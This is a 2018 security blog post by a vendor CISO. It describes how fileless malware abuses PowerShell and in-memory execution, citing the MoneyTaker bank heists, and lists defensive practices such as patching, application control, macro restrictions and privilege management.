Fight Fileless Malware on All Fronts

Tuesday, November 06, 2018

Phil Richards

19a7ca3d87a072ea73d7ad53df294881

Take a unified approach: patch and protect all elements of your ecosystem to prevent new attacks.

The Ponemon Institute estimates that more than half of all attacks against businesses in 2017 were fileless. Cyber criminals continue to find new, creative ways to disrupt organizations, and a new favorite that gained traction last year is fileless malware. No doubt, 2018 statistics, when compiled, will indicate fileless malware is among the prevalent attacks as cyber attackers exploit capabilities in Microsoft’s Power Shell, Windows Management Instrumentation (WMI) and MacOS Shell.

Cyber Criminals Love Fileless

The recent trend of fileless malware is part of a larger cybercrime story, that of attackers using a variety of scripts to introduce malware or command and control capabilities into an enterprise. PowerShell, for example, is mainly used to automate administration tasks, including managing configurations of systems and servers. It has been exploited by scripting malware families like W97/Downloader, Kovter fileless malware, Nemucod and other JavaScript downloaders.

One of the latest examples of fileless malware and script attacks was the heist of close to $1 million from a Russian bank. The cyber criminal group, known as MoneyTaker, is believed to have conducted more than 20 successful attacks on financial institutions and legal firms in Russia, the UK and the U.S. Researchers estimate a total figure of $14 million, from 16 U.S. targets, five Russian banks and one hack of a UK banking-software firm. As reported, the group used widely available tools including PowerShell, Visual Basic and the Metasploit exploit framework, plus their own custom-made fileless malware, to hack into these networks.

Why Fileless Works so Well

Fileless malware has become the darling of cyber criminals because, quite simply, it’s a no-brainer. Rather than wait for some human to open a phishing email or inadequately encrypted application, fileless malware works on what is already in your network, i.e., the day-to-day scripts enterprises use, like PowerShell, VBScript or JavaScript. It is easier to conduct an exploit and harder to detect. The malware can be executed entirely from the command line and with capabilities such as executing commands written in base 64 encoding, it may be very difficult to see the malware running. Fileless malware typically does not require downloading additional malicious files – the hacker simply executes a command with arguments on the command line. These commands however, are capable of stealing data and credentials, spying on IT environments, and leaving back doors open to further exploits. Another tactic is to exploit in-memory access and running applications, such as web browsers and Office applications to conduct malicious behavior.

A fileless infection could be malicious code or data that exists only in memory. It isn’t installed to the target computer’s hard drive. Written directly to RAM, the code is injected into a running process where it can be used for the exploit. And, since it doesn’t exist as a true file, it can often go undetected by antivirus software and intrusion prevention systems. This “zero footprint” intrusion leverages legitimate programs and data to perform desired tasks, while remaining nearly undetectable using traditional detection methods. The infection can remain live until the system is rebooted and the fileless malware is purged from the infected system’s memory, enabling attackers to steal data or download more persistent malware to use in future attacks.

Fighting Back against Fileless

Fileless malware is particularly insidious since traditional antivirus solutions simply aren’t enough of a defense. It has prompted security teams to take a multi-faceted approach to detecting threats and preventing new attacks. ‘Threat hunting’ includes actions such as log analysis of all network devices to detect threat activity like unusual domain name system (DNS) requests or suspicious registry of system file changes; establishing a baseline of approved network traffic; examining behavioral attributes of network users, and understanding baseline endpoint activity of applications and users to detect suspicious activity.

How can fileless malware be avoided? Really, the short answer is, in light of the increasing popularity of these attacks, you need to do it all – to take a unified approach, looking across your enterprise and executing threat-prevention practices wherever possible.

Here are recommended practices for a unified IT approach to fighting back against fileless malware:

  1. Patch Management is critical to preventing attacks of all kind. Make sure your endpoints and servers are contained in the patch cycle to optimize threat protection. And make those Microsoft patches in a timely fashion! For example, the Microsoft August patch list contained two zero-day vulnerabilities:  CVE-2018-8373 [Internet Explorer] and CVE-2018-8414 [Windows Shell]. Given there are known exploits, you should give these fixes top priority.
  2. Advanced Application Control prevents malicious software as well as scripts from executing. By restricting unnecessary scripting languages, you can limit the frameworks that can be used to secretly execute commands on the host system.
  3. Disable Macros and apply memory protection techniques. If you can’t disable macros, consider applying technology to digitally sign macros that are authorized for use by the organization.
  4. Most Advanced Antivirus Technology gives you the most powerful means of addressing the threat at the kernel level.
  5. Privilege Management is essential to limiting threats by giving users the exact level of rights they need to get their job done, and nothing beyond that. Following strict privilege practices helps ensure user credentials – if compromised – don’t allow cyber criminals access to OS tools that will introduce a fileless infection.
  6. Isolation Policies are also effective against fileless attacks. They can limit the reach of any fileless malware intrusion.
  7. Insight Tools can afford a better view into your most vulnerable systems, using techniques such as Web Application Firewalls (WAFs) to protect potentially exposed systems.
  8. Enforce Policies on removable devices. Locking down user devices, such as flash drives, can further prevent fileless malware exposure.

What’s Next?

“The time it takes cybercriminals to compromise a system is often just a matter of minutes—or even seconds. They don’t need much time to extract valuable data—they usually have much more than they need as it typically takes organizations weeks or months to discover a breach.” A cautionary note from Verizon’s 2018 Data Breach Investigations Report. Verizon reported that 68% of the breaches took months or longer to discover, and to add to the deficit, many breaches are discovered by customers, damaging a company’s brand reputation.

The MoneyTaker group was reported to have spent months investigating a target’s network, in order to elevate system privileges to those of a domain administrator, then to remain active inside the network following the heist.

The message here is: taking a unified approach – enforcing every possible security policy to prevent these attacks and exercising constant vigilance - is the only way to fight back against fileless malware!

About the author: Phil Richards is the Chief Information Security Officer (CISO) for Ivanti. Prior to Ivanti he has held other senior security positions including the Director of Operational Security for Varian Medical Systems, Chief Security Officer for Fundtech Corporation and Business Security Director for Fidelity Investments.

Possibly Related Articles:
11112
Viruses & Malware Enterprise Security Security Awareness
malware Protection Fileless Malware
Post Rating I Like this!
The views expressed in this post are the opinions of the Infosec Island member that posted this content. Infosec Island is not responsible for the content or messaging of this post.

Unauthorized reproduction of this article (in part or in whole) is prohibited without the express written permission of Infosec Island and the Infosec Island member that posted this content--this includes using our RSS feed for any purpose other than personal use.